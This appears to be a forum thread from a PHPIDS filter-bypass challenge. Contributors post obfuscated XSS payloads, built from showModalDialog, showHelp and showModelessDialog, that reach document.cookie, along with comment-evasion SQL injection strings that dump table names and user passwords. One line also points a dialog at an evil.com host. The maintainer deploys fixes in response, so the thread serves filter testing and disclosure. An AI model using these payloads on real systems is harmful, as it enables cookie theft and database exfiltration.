nice work hafif :)

thornmaker Wrote:
-------------------------------------------------------
> nice work hafif :)


Thanks :)

Here is one for Chrome and FF. using a popup.
http://demo.phpids.org/?test=showModalDialog%28%28/javascript/%28{a:/javascript/,b:1}.a%29%29%2b%28/:aler/%28{a:/:aler/,b:1}.a%29%29%2b%28/t.1.%2b1/%28{a:/t%281%29%2b1/,b:1}.a%29%29%29;

or you can just showModalDialog("http://evil.com"), but then you will lose the domain context (and you want it)

If popupblocker is on, it will block the script, if not the script will run.
Otherwise, clicking on the links and launching the "onclick" events, will cause script execution.

I am sure I can get it simplified... but I am to tired (it's 4 AM )



Edited 6 time(s). Last edit at 06/29/2011 06:03AM by hafif.

A few bypasses in this bad boy

str'=version()
UNION#
#
#
#
SELECT group_concat(table_name)#
##
/*!FROM*/ information_schema.tables WHERE '1

Phew - all fixed. Sorry for the delay and thanks! The showModalDialog bypass was pretty... ironic :D

:D Indeed.

The next one is an upgrade of an older bypass. I added some evasions just to prove that we have no limitation. I had a hard time generating the letter t, finally I did it:

Works on IE.
http://demo.phpids.org/?test=%0d%2ba%0d>>showHelp(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t id=a a=javascrip b=:confi c=rm(documen d=.coo e=kie) >1<<1\'1'1\"1";

//Notice we lose domain context... but still it has some nice stuff.



Edited 1 time(s). Last edit at 07/06/2011 04:35PM by hafif.

@hafif Haha - nice, showHelp() - so some people do read the MSDN :D Sorry for the very late reply. Just deployed a fix! Thanks!

.mario Wrote:
-------------------------------------------------------
> @hafif Haha - nice, showHelp() - so some people do
> read the MSDN :D Sorry for the very late reply.
> Just deployed a fix! Thanks!


:) Well I didn't. But now I did, so you might want to add showModelessDialog since it might enable information and cookie theft.
http://demo.phpids.org/?test=%0d%2ba%0d>>showModelessDialog(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t%20id=a%20a=javascrip%20b=:confi%20c=rm(documen%20d=.coo%20e=kie)%20>1<<1\'1'1\"1";

I was going to check the phpids site to see if you mind other people using it and what for but the site (php-ids.org/) is down :(

Also you almost definitely thought of this ages ago but using a client side filter and checking server-side to see if it's been bypassed provides a way of detecting malicious users that probably has few false positives.

@Albino: the new url is https://phpids.org/

any download url?

MySQL 5:
'||(true)#1'
'||true#'

'=true
UNION#
#
#
#original_by_lightos
SELECT \N,group_concat(password)#
##
/*!FROM*/ users WHERE '1